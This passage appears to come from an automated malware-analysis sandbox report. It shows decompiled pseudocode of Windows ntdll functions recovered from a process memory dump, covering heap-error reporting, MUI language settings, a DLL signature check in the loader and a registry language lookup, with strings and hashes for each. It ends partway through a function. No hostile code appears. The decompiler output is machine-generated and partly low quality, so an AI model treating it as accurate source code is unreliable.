            • Instruction ID: 1a2a13d3b6de624523022c3ecef79d6a6c7a86862a83393e34ecc2e1b9724a23
            • Opcode Fuzzy Hash: 7d2ff9bcdc0ff37d38b9381c50bca6e83e39baecdffcf9a45f30257e96589682
            • Instruction Fuzzy Hash: C1B04CB19015C589FB119760460861779006BD0745F16C052D1021651A4778D091F5B6
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Strings
            • The critical section is owned by thread %p., xrefs: 044DB3B9
            • The resource is owned shared by %d threads, xrefs: 044DB37E
            • write to, xrefs: 044DB4A6
            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044DB3D6
            • The instruction at %p referenced memory at %p., xrefs: 044DB432
            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 044DB2F3
            • a NULL pointer, xrefs: 044DB4E0
            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 044DB2DC
            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 044DB323
            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 044DB305
            • *** Resource timeout (%p) in %ws:%s, xrefs: 044DB352
            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 044DB476
            • *** An Access Violation occurred in %ws:%s, xrefs: 044DB48F
            • *** then kb to get the faulting stack, xrefs: 044DB51C
            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 044DB47D
            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 044DB53F
            • The resource is owned exclusively by thread %p, xrefs: 044DB374
            • Go determine why that thread has not released the critical section., xrefs: 044DB3C5
            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 044DB314
            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 044DB39B
            • <unknown>, xrefs: 044DB27E, 044DB2D1, 044DB350, 044DB399, 044DB417, 044DB48E
            • read from, xrefs: 044DB4AD, 044DB4B2
            • This failed because of error %Ix., xrefs: 044DB446
            • *** enter .cxr %p for the context, xrefs: 044DB50D
            • *** enter .exr %p for the exception record, xrefs: 044DB4F1
            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 044DB38F
            • *** Inpage error in %ws:%s, xrefs: 044DB418
            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 044DB484
            • The instruction at %p tried to %s , xrefs: 044DB4B6
            • an invalid address, %p, xrefs: 044DB4CF
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
            • API String ID: 0-108210295
            • Opcode ID: 76907fd0ac3a7b9ed16dd25b5c022fbaf33d809ae89d358b6dfc3705ec108431
            • Instruction ID: 9b6f4dfd95eabe0676ff7d4818c67afecf9f04318f7d4fe67ae88a11667bceb1
            • Opcode Fuzzy Hash: 76907fd0ac3a7b9ed16dd25b5c022fbaf33d809ae89d358b6dfc3705ec108431
            • Instruction Fuzzy Hash: D98127B5B00250FFEF229E069C56DAB7B26DF47759F02404BFA041B222E375B502DAB1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E044E1C06() {
            				signed int _t27;
            				char* _t104;
            				char* _t105;
            				intOrPtr _t113;
            				intOrPtr _t115;
            				intOrPtr _t117;
            				intOrPtr _t119;
            				intOrPtr _t120;
            
            				_t105 = 0x44048a4;
            				_t104 = "HEAP: ";
            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            					_push(_t104);
            					E0442B150();
            				} else {
            					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            				}
            				_push( *0x451589c);
            				E0442B150("Heap error detected at %p (heap handle %p)\n",  *0x45158a0);
            				_t27 =  *0x4515898; // 0x0
            				if(_t27 <= 0xf) {
            					switch( *((intOrPtr*)(_t27 * 4 +  &M044E1E96))) {
            						case 0:
            							_t105 = "heap_failure_internal";
            							goto L21;
            						case 1:
            							goto L21;
            						case 2:
            							goto L21;
            						case 3:
            							goto L21;
            						case 4:
            							goto L21;
            						case 5:
            							goto L21;
            						case 6:
            							goto L21;
            						case 7:
            							goto L21;
            						case 8:
            							goto L21;
            						case 9:
            							goto L21;
            						case 0xa:
            							goto L21;
            						case 0xb:
            							goto L21;
            						case 0xc:
            							goto L21;
            						case 0xd:
            							goto L21;
            						case 0xe:
            							goto L21;
            						case 0xf:
            							goto L21;
            					}
            				}
            				L21:
            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            					_push(_t104);
            					E0442B150();
            				} else {
            					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            				}
            				_push(_t105);
            				E0442B150("Error code: %d - %s\n",  *0x4515898);
            				_t113 =  *0x45158a4; // 0x0
            				if(_t113 != 0) {
            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            						_push(_t104);
            						E0442B150();
            					} else {
            						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            					}
            					E0442B150("Parameter1: %p\n",  *0x45158a4);
            				}
            				_t115 =  *0x45158a8; // 0x0
            				if(_t115 != 0) {
            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            						_push(_t104);
            						E0442B150();
            					} else {
            						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            					}
            					E0442B150("Parameter2: %p\n",  *0x45158a8);
            				}
            				_t117 =  *0x45158ac; // 0x0
            				if(_t117 != 0) {
            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            						_push(_t104);
            						E0442B150();
            					} else {
            						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            					}
            					E0442B150("Parameter3: %p\n",  *0x45158ac);
            				}
            				_t119 =  *0x45158b0; // 0x0
            				if(_t119 != 0) {
            					L41:
            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            						_push(_t104);
            						E0442B150();
            					} else {
            						E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            					}
            					_push( *0x45158b4);
            					E0442B150("Last known valid blocks: before - %p, after - %p\n",  *0x45158b0);
            				} else {
            					_t120 =  *0x45158b4; // 0x0
            					if(_t120 != 0) {
            						goto L41;
            					}
            				}
            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
            					_push(_t104);
            					E0442B150();
            				} else {
            					E0442B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
            				}
            				return E0442B150("Stack trace available at %p\n", 0x45158c0);
            			}












            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
            • API String ID: 0-2897834094
            • Opcode ID: 576b3d5559709e4ec00ebf2b071c45f49468174d80c884323eacb53f3773793e
            • Instruction ID: 7313d00f420a53db3fa64d0513518bd77e369af9c4c495a671397246b5d38a35
            • Opcode Fuzzy Hash: 576b3d5559709e4ec00ebf2b071c45f49468174d80c884323eacb53f3773793e
            • Instruction Fuzzy Hash: 48610C37650154EFEE119B87D585E3173A4E704A72BA9C02FF90A6B321E638FC51AF09
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E04433D34(signed int* __ecx) {
            				signed int* _v8;
            				char _v12;
            				signed int* _v16;
            				signed int* _v20;
            				char _v24;
            				signed int _v28;
            				signed int _v32;
            				char _v36;
            				signed int _v40;
            				signed int _v44;
            				signed int* _v48;
            				signed int* _v52;
            				signed int _v56;
            				signed int _v60;
            				char _v68;
            				signed int _t140;
            				signed int _t161;
            				signed int* _t236;
            				signed int* _t242;
            				signed int* _t243;
            				signed int* _t244;
            				signed int* _t245;
            				signed int _t255;
            				void* _t257;
            				signed int _t260;
            				void* _t262;
            				signed int _t264;
            				void* _t267;
            				signed int _t275;
            				signed int* _t276;
            				short* _t277;
            				signed int* _t278;
            				signed int* _t279;
            				signed int* _t280;
            				short* _t281;
            				signed int* _t282;
            				short* _t283;
            				signed int* _t284;
            				void* _t285;
            
            				_v60 = _v60 | 0xffffffff;
            				_t280 = 0;
            				_t242 = __ecx;
            				_v52 = __ecx;
            				_v8 = 0;
            				_v20 = 0;
            				_v40 = 0;
            				_v28 = 0;
            				_v32 = 0;
            				_v44 = 0;
            				_v56 = 0;
            				_t275 = 0;
            				_v16 = 0;
            				if(__ecx == 0) {
            					_t280 = 0xc000000d;
            					_t140 = 0;
            					L50:
            					 *_t242 =  *_t242 | 0x00000800;
            					_t242[0x13] = _t140;
            					_t242[0x16] = _v40;
            					_t242[0x18] = _v28;
            					_t242[0x14] = _v32;
            					_t242[0x17] = _t275;
            					_t242[0x15] = _v44;
            					_t242[0x11] = _v56;
            					_t242[0x12] = _v60;
            					return _t280;
            				}
            				if(E04431B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
            					_v56 = 1;
            					if(_v8 != 0) {
            						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
            					}
            					_v8 = _t280;
            				}
            				if(E04431B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
            					_v60 =  *_v8;
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
            					_v8 = _t280;
            				}
            				if(E04431B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
            					L16:
            					if(E04431B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
            						L28:
            						if(E04431B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
            							L46:
            							_t275 = _v16;
            							L47:
            							_t161 = 0;
            							L48:
            							if(_v8 != 0) {
            								L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
            							}
            							_t140 = _v20;
            							if(_t140 != 0) {
            								if(_t275 != 0) {
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
            									_t275 = 0;
            									_v28 = 0;
            									_t140 = _v20;
            								}
            							}
            							goto L50;
            						}
            						_t167 = _v12;
            						_t255 = _v12 + 4;
            						_v44 = _t255;
            						if(_t255 == 0) {
            							_t276 = _t280;
            							_v32 = _t280;
            						} else {
            							_t276 = L04444620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
            							_t167 = _v12;
            							_v32 = _t276;
            						}
            						if(_t276 == 0) {
            							_v44 = _t280;
            							_t280 = 0xc0000017;
            							goto L46;
            						} else {
            							E0446F3E0(_t276, _v8, _t167);
            							_v48 = _t276;
            							_t277 = E04471370(_t276, 0x4404e90);
            							_pop(_t257);
            							if(_t277 == 0) {
            								L38:
            								_t170 = _v48;
            								if( *_v48 != 0) {
            									E0446BB40(0,  &_v68, _t170);
            									if(L044343C0( &_v68,  &_v24) != 0) {
            										_t280 =  &(_t280[0]);
            									}
            								}
            								if(_t280 == 0) {
            									_t280 = 0;
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
            									_v44 = 0;
            									_v32 = 0;
            								} else {
            									_t280 = 0;
            								}
            								_t174 = _v8;
            								if(_v8 != 0) {
            									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
            								}
            								_v8 = _t280;
            								goto L46;
            							}
            							_t243 = _v48;
            							do {
            								 *_t277 = 0;
            								_t278 = _t277 + 2;
            								E0446BB40(_t257,  &_v68, _t243);
            								if(L044343C0( &_v68,  &_v24) != 0) {
            									_t280 =  &(_t280[0]);
            								}
            								_t243 = _t278;
            								_t277 = E04471370(_t278, 0x4404e90);
            								_pop(_t257);
            							} while (_t277 != 0);
            							_v48 = _t243;
            							_t242 = _v52;
            							goto L38;
            						}
            					}
            					_t191 = _v12;
            					_t260 = _v12 + 4;
            					_v28 = _t260;
            					if(_t260 == 0) {
            						_t275 = _t280;
            						_v16 = _t280;
            					} else {
            						_t275 = L04444620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
            						_t191 = _v12;
            						_v16 = _t275;
            					}
            					if(_t275 == 0) {
            						_v28 = _t280;
            						_t280 = 0xc0000017;
            						goto L47;
            					} else {
            						E0446F3E0(_t275, _v8, _t191);
            						_t285 = _t285 + 0xc;
            						_v48 = _t275;
            						_t279 = _t280;
            						_t281 = E04471370(_v16, 0x4404e90);
            						_pop(_t262);
            						if(_t281 != 0) {
            							_t244 = _v48;
            							do {
            								 *_t281 = 0;
            								_t282 = _t281 + 2;
            								E0446BB40(_t262,  &_v68, _t244);
            								if(L044343C0( &_v68,  &_v24) != 0) {
            									_t279 =  &(_t279[0]);
            								}
            								_t244 = _t282;
            								_t281 = E04471370(_t282, 0x4404e90);
            								_pop(_t262);
            							} while (_t281 != 0);
            							_v48 = _t244;
            							_t242 = _v52;
            						}
            						_t201 = _v48;
            						_t280 = 0;
            						if( *_v48 != 0) {
            							E0446BB40(_t262,  &_v68, _t201);
            							if(L044343C0( &_v68,  &_v24) != 0) {
            								_t279 =  &(_t279[0]);
            							}
            						}
            						if(_t279 == 0) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
            							_v28 = _t280;
            							_v16 = _t280;
            						}
            						_t202 = _v8;
            						if(_v8 != 0) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
            						}
            						_v8 = _t280;
            						goto L28;
            					}
            				}
            				_t214 = _v12;
            				_t264 = _v12 + 4;
            				_v40 = _t264;
            				if(_t264 == 0) {
            					_v20 = _t280;
            				} else {
            					_t236 = L04444620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
            					_t280 = _t236;
            					_v20 = _t236;
            					_t214 = _v12;
            				}
            				if(_t280 == 0) {
            					_t161 = 0;
            					_t280 = 0xc0000017;
            					_v40 = 0;
            					goto L48;
            				} else {
            					E0446F3E0(_t280, _v8, _t214);
            					_t285 = _t285 + 0xc;
            					_v48 = _t280;
            					_t283 = E04471370(_t280, 0x4404e90);
            					_pop(_t267);
            					if(_t283 != 0) {
            						_t245 = _v48;
            						do {
            							 *_t283 = 0;
            							_t284 = _t283 + 2;
            							E0446BB40(_t267,  &_v68, _t245);
            							if(L044343C0( &_v68,  &_v24) != 0) {
            								_t275 = _t275 + 1;
            							}
            							_t245 = _t284;
            							_t283 = E04471370(_t284, 0x4404e90);
            							_pop(_t267);
            						} while (_t283 != 0);
            						_v48 = _t245;
            						_t242 = _v52;
            					}
            					_t224 = _v48;
            					_t280 = 0;
            					if( *_v48 != 0) {
            						E0446BB40(_t267,  &_v68, _t224);
            						if(L044343C0( &_v68,  &_v24) != 0) {
            							_t275 = _t275 + 1;
            						}
            					}
            					if(_t275 == 0) {
            						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
            						_v40 = _t280;
            						_v20 = _t280;
            					}
            					_t225 = _v8;
            					if(_v8 != 0) {
            						L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
            					}
            					_v8 = _t280;
            					goto L16;
            				}
            			}

            Strings
            • Kernel-MUI-Language-Allowed, xrefs: 04433DC0
            • Kernel-MUI-Number-Allowed, xrefs: 04433D8C
            • Kernel-MUI-Language-SKU, xrefs: 04433F70
            • WindowsExcludedProcs, xrefs: 04433D6F
            • Kernel-MUI-Language-Disallowed, xrefs: 04433E97
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
            • API String ID: 0-258546922
            • Opcode ID: 8dc6f0dfccf58419666af0344e7261602e973ccee667b2844ba5db0c198f61b3
            • Instruction ID: 3d84041976d957ed5b5220f4b8c4af26c9065c050080e245d2bcf36bf1987a08
            • Opcode Fuzzy Hash: 8dc6f0dfccf58419666af0344e7261602e973ccee667b2844ba5db0c198f61b3
            • Instruction Fuzzy Hash: 49F11C72D00619EBDF11EF99C980AEFB7B9FF48A54F14406BE905A7251E734AE01CB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 98%
            			E04437E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
            				char _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				char _v24;
            				signed int _t73;
            				void* _t77;
            				char* _t82;
            				char* _t87;
            				signed char* _t97;
            				signed char _t102;
            				intOrPtr _t107;
            				signed char* _t108;
            				intOrPtr _t112;
            				intOrPtr _t124;
            				intOrPtr _t125;
            				intOrPtr _t126;
            
            				_t107 = __edx;
            				_v12 = __ecx;
            				_t125 =  *((intOrPtr*)(__ecx + 0x20));
            				_t124 = 0;
            				_v20 = __edx;
            				if(E0443CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
            					_t112 = _v8;
            				} else {
            					_t112 = 0;
            					_v8 = 0;
            				}
            				if(_t112 != 0) {
            					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
            						_t124 = 0xc000007b;
            						goto L8;
            					}
            					_t73 =  *(_t125 + 0x34) | 0x00400000;
            					 *(_t125 + 0x34) = _t73;
            					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
            						goto L3;
            					}
            					 *(_t125 + 0x34) = _t73 | 0x01000000;
            					_t124 = E0442C9A4( *((intOrPtr*)(_t125 + 0x18)));
            					if(_t124 < 0) {
            						goto L8;
            					} else {
            						goto L3;
            					}
            				} else {
            					L3:
            					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
            						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
            						L8:
            						return _t124;
            					}
            					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
            						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
            							goto L5;
            						}
            						_t102 =  *0x4515780; // 0x0
            						if((_t102 & 0x00000003) != 0) {
            							E044A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
            							_t102 =  *0x4515780; // 0x0
            						}
            						if((_t102 & 0x00000010) != 0) {
            							asm("int3");
            						}
            						_t124 = 0xc0000428;
            						goto L8;
            					}
            					L5:
            					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
            						goto L8;
            					}
            					_t77 = _a4 - 0x40000003;
            					if(_t77 == 0 || _t77 == 0x33) {
            						_v16 =  *((intOrPtr*)(_t125 + 0x18));
            						if(E04447D50() != 0) {
            							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            						} else {
            							_t82 = 0x7ffe0384;
            						}
            						_t108 = 0x7ffe0385;
            						if( *_t82 != 0) {
            							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
            								if(E04447D50() == 0) {
            									_t97 = 0x7ffe0385;
            								} else {
            									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
            								}
            								if(( *_t97 & 0x00000020) != 0) {
            									E044A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
            								}
            							}
            						}
            						if(_a4 != 0x40000003) {
            							L14:
            							_t126 =  *((intOrPtr*)(_t125 + 0x18));
            							if(E04447D50() != 0) {
            								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            							} else {
            								_t87 = 0x7ffe0384;
            							}
            							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
            								if(E04447D50() != 0) {
            									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
            								}
            								if(( *_t108 & 0x00000020) != 0) {
            									E044A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
            								}
            							}
            							goto L8;
            						} else {
            							_v16 = _t125 + 0x24;
            							_t124 = E0445A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
            							if(_t124 < 0) {
            								E0442B1E1(_t124, 0x1490, 0, _v16);
            								goto L8;
            							}
            							goto L14;
            						}
            					} else {
            						goto L8;
            					}
            				}
            			}

            Strings
            • LdrpCompleteMapModule, xrefs: 04489898
            • minkernel\ntdll\ldrmap.c, xrefs: 044898A2
            • Could not validate the crypto signature for DLL %wZ, xrefs: 04489891
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
            • API String ID: 0-1676968949
            • Opcode ID: 1508754849c5711c340fd6a3880e534428a2e41fca3a4cd233f27cd40d59aa09
            • Instruction ID: 8e58b164b813b98010fbfe66d751f623ff4650a222f3379c88d5132fa340d05f
            • Opcode Fuzzy Hash: 1508754849c5711c340fd6a3880e534428a2e41fca3a4cd233f27cd40d59aa09
            • Instruction Fuzzy Hash: 4E511FB1604B459BEF21DF68C941B2ABBE0EB08B15F1445ABE8919B3E1D730FC01DB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0442E620(void* __ecx, short* __edx, short* _a4) {
            				char _v16;
            				char _v20;
            				intOrPtr _v24;
            				char* _v28;
            				char _v32;
            				char _v36;
            				char _v44;
            				signed int _v48;
            				intOrPtr _v52;
            				void* _v56;
            				void* _v60;
            				char _v64;
            				void* _v68;
            				void* _v76;
            				void* _v84;
            				signed int _t59;
            				signed int _t74;
            				signed short* _t75;
            				signed int _t76;
            				signed short* _t78;
            				signed int _t83;
            				short* _t93;
            				signed short* _t94;
            				short* _t96;
            				void* _t97;
            				signed int _t99;
            				void* _t101;
            				void* _t102;
            
            				_t80 = __ecx;
            				_t101 = (_t99 & 0xfffffff8) - 0x34;
            				_t96 = __edx;
            				_v44 = __edx;
            				_t78 = 0;
            				_v56 = 0;
            				if(__ecx == 0 || __edx == 0) {
            					L28:
            					_t97 = 0xc000000d;
            				} else {
            					_t93 = _a4;
            					if(_t93 == 0) {
            						goto L28;
            					}
            					_t78 = E0442F358(__ecx, 0xac);
            					if(_t78 == 0) {
            						_t97 = 0xc0000017;
            						L6:
            						if(_v56 != 0) {
            							_push(_v56);
            							E044695D0();
            						}
            						if(_t78 != 0) {
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
            						}
            						return _t97;
            					}
            					E0446FA60(_t78, 0, 0x158);
            					_v48 = _v48 & 0x00000000;
            					_t102 = _t101 + 0xc;
            					 *_t96 = 0;
            					 *_t93 = 0;
            					E0446BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
            					_v36 = 0x18;
            					_v28 =  &_v44;
            					_v64 = 0;
            					_push( &_v36);
            					_push(0x20019);
            					_v32 = 0;
            					_push( &_v64);
            					_v24 = 0x40;
            					_v20 = 0;
            					_v16 = 0;
            					_t97 = E04469600();
            					if(_t97 < 0) {
            						goto L6;
            					}
            					E0446BB40(0,  &_v36, L"InstallLanguageFallback");
            					_push(0);
            					_v48 = 4;
            					_t97 = L0442F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
            					if(_t97 >= 0) {
            						if(_v52 != 1) {
            							L17:
            							_t97 = 0xc0000001;
            							goto L6;
            						}
            						_t59 =  *_t78 & 0x0000ffff;
            						_t94 = _t78;
            						_t83 = _t59;
            						if(_t59 == 0) {
            							L19:
            							if(_t83 == 0) {
            								L23:
            								E0446BB40(_t83, _t102 + 0x24, _t78);
            								if(L044343C0( &_v48,  &_v64) == 0) {
            									goto L17;
            								}
            								_t84 = _v48;
            								 *_v48 = _v56;
            								if( *_t94 != 0) {
            									E0446BB40(_t84, _t102 + 0x24, _t94);
            									if(L044343C0( &_v48,  &_v64) != 0) {
            										 *_a4 = _v56;
            									} else {
            										_t97 = 0xc0000001;
            										 *_v48 = 0;
            									}
            								}
            								goto L6;
            							}
            							_t83 = _t83 & 0x0000ffff;
            							while(_t83 == 0x20) {
            								_t94 =  &(_t94[1]);
            								_t74 =  *_t94 & 0x0000ffff;
            								_t83 = _t74;
            								if(_t74 != 0) {
            									continue;
            								}
            								goto L23;
            							}
            							goto L23;
            						} else {
            							goto L14;
            						}
            						while(1) {
            							L14:
            							_t27 =  &(_t94[1]); // 0x2
            							_t75 = _t27;
            							if(_t83 == 0x2c) {
            								break;
            							}
            							_t94 = _t75;
            							_t76 =  *_t94 & 0x0000ffff;
            							_t83 = _t76;
            							if(_t76 != 0) {
            								continue;
            							}
            							goto L23;
            						}
            						 *_t94 = 0;
            						_t94 = _t75;
            						_t83 =  *_t75 & 0x0000ffff;
            						goto L19;
            					}
            				}
            			}

            Strings
            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0442E68C
            • InstallLanguageFallback, xrefs: 0442E6DB
            • @, xrefs: 0442E6C0
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
            • API String ID: 0-1757540487
            • Opcode ID: f304452884ecd150e8d5448eb25898ff925d64f373dd759a1a8f0b889aca4a11
            • Instruction ID: 8da5e15d085b0b19a8bc7670e6a6371d9bb7f2a54270c73f5f23258fb923ff40
            • Opcode Fuzzy Hash: f304452884ecd150e8d5448eb25898ff925d64f373dd759a1a8f0b889aca4a11
            • Instruction Fuzzy Hash: D8518072504365ABDB14EF65C440B6BB3E8AF88B14F55092FF985D7240FB35E90487A2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 76%
            			E0444B944(signed int* __ecx, char __edx) {
            				signed int _v8;
            				signed int _v16;
            				signed int _v20;
            				char _v28;
            				signed int _v32;
            				char _v36;
            				signed int _v40;
            				intOrPtr _v44;
            				signed int* _v48;
            				signed int _v52;
            				signed int _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				intOrPtr _v76;
            				char _v77;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr* _t65;
            				intOrPtr _t67;
            				intOrPtr _t68;
            				char* _t73;
            				intOrPtr _t77;
            				intOrPtr _t78;
            				signed int _t82;
            				intOrPtr _t83;
            				void* _t87;
